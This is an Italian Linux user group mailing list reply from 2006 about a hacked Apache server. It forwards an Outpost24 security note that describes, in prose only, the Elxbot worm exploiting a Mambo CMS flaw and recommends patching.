erlug
[Top] [All Lists]

Re: [Erlug] apache hackerato(?)

To: ERlug - Lista Pubblica <erlug@xxxxxxxxxxxxxx>
Subject: Re: [Erlug] apache hackerato(?)
From: Massimo Danieli <m.danieli@xxxxxxxxxxxx>
Date: Fri, 12 May 2006 00:12:09 +0200
On gio, 2006-05-11 at 23:55 +0200, Filippo Biondi wrote:
> Il giorno gio, 11/05/2006 alle 20.54 +0200, Massimo Danieli ha scritto:
> 
> > > 1) Come cavolo e' riuscito a far fare quella request al mio webserver?
> > > Ed a far eseguire il file una volta scaricatolo.
> > > E' per caso dovuto all'azione di un altro script?
> > 
> > Probabilmente un software che permette injection-code (un bel forum in
> > php per caso, o mambo ? )
> 
> la seconda che hai detto



From: David Jacoby <security_at_outpost24.com>
        Date: Mon, 05 Dec 2005 21:23:23 +0100
        
          _______ __ __ ______ _____ 
        | |.--.--.| |_ .-----..-----..-----.| |_ |__ || | | 
        | - || | || _|| _ || _ ||__ --|| _|| __||__ | 
        |_______||_____||____|| __||_____||_____||____||______| |__| 
          Public Security Note |__| http://www.outpost24.com 
        
        
        [BACKGROUND] 
        Mambo is a dynamic portal engine and content management system. 
        The software is written in PHP. A computer researcher which
        goes 
        under the alias rgod released an exploit for the
        "register_globals" 
        Emulation Layer Overwrite vulnerability and just a few days
        after 
        the vulnerability was released increased attacks for this
        vulnerability 
        was monitored, the increased traffic is due to a worm which is 
        currently in the wild. 
        
        
        [DESCRIPTION] 
        Linux/Elxbot is a backdoor for the Mambo vulnerability. It will
        search 
        on Google for vulnerable targets. Once it infects a computer it
        will 
        connect to a predetermined IRC server where the attackers will
        wait and 
        have the possibility to gain access to the infected computer.
        The
        attackers 
        may also perform various tasks such as: 
        
        
        * Execute arbitrary commands 
        * TCP flood 
        * HTTP flood 
        * UDP flood 
        * Search Google for more vulnerable targets 
        * Portscan 
        
        
        On certain systems it will also download a perl script which
        will 
        allow the attacker to create a backchannel and spawn a shell on 
        the infected computer with the same privileges as the running
        webserver. 
        
        
        A detailed profile is available for Outpost24 members, for more
        information 
        please visit our webpage at http://www.outpost24.com 
        
        
        [SOLUTION] 
        Download the latest version from the official Mambo homepage or 
        download the specific patch for this vulnerability.
        


<Prev in Thread] Current Thread [Next in Thread>